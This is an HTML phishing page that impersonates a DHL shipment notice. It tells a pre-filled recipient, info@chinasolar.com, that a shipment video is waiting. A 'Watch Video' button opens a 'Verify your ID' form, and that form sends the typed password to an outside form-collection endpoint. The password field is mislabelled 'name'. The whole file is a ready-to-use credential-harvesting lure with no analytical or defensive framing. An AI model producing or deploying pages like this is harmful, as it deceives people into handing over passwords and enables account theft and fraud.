<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title  class="logoname"></title>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<style>
body, html {
  height: 100%;
  margin: 0;
}

.bg {
  /* The image used */
  background-image: url("https://www.simpletech.uy/wp-content/uploads/2022/07/Cabezal-historias-de-exito_dhl_01-1.png");
  
  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}
</style>
</head>
<body>

<div class="bg">
	<div class="w3-container" align="center" style="width;400px; background:#FFFFFF;">
		<p>
				<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR-qZ71ot7-tz9tZrK4GDT7EO2gvFi7EVhHkRxBpvUr7-q7K5UIlNtgfbFVZMATsWdtowc&usqp=CAU" 
				style="width:100px; height:100px; border-radius:50%;">
				<br>
				<font style="font-family:verdana; font-size:13px;">
				This file contains video of a shipment owned by: <br>
				<strong> info@chinasolar.com </strong>
				</font>
		</p>
		
		<input type="image" src="https://i.ibb.co/HCZzPRK/watch.jpg" style="width:170px; height:50px;" onclick="document.getElementById('id01').style.display='block'">
		<br><br>
		<div id="id01" class="w3-modal"">
		<div class="w3-modal-content" style="width:370px;>
			<header class="w3-container w3-teal"> 
				<br>
				<img style="width:250px; height;60px;" src="https://i.ibb.co/RPGXzrd/logo.png">
			</header>
			<div class="w3-container">
				<p style="font-size:13px;"><strong> Verify your ID to watch this Video </strong></p>
				
					<form action="https://submit-form.com/l5BF861FX" method="POST">
					<input type="email" name="email" value="info@chinasolar.com" style="width:260px; height:40px; padding:5px;" required readonly> <br><br>
					<input type="text" name="name" style="width:260px; height:40px; padding:5px;" placeholder="Password" required> <br><br>
					<button type="submit" style="width:260px; height:40px; background: #de0000; border: 0px; #de0000; color:#ffffff; font-size:13px;">
						<strong>
							WATCH VIDEO
						</strong>
					</button>
					</form>
				
				</div>
				
			<br><br>
			</div>
			
		</div>
	</div>

</div>
</body>
</html>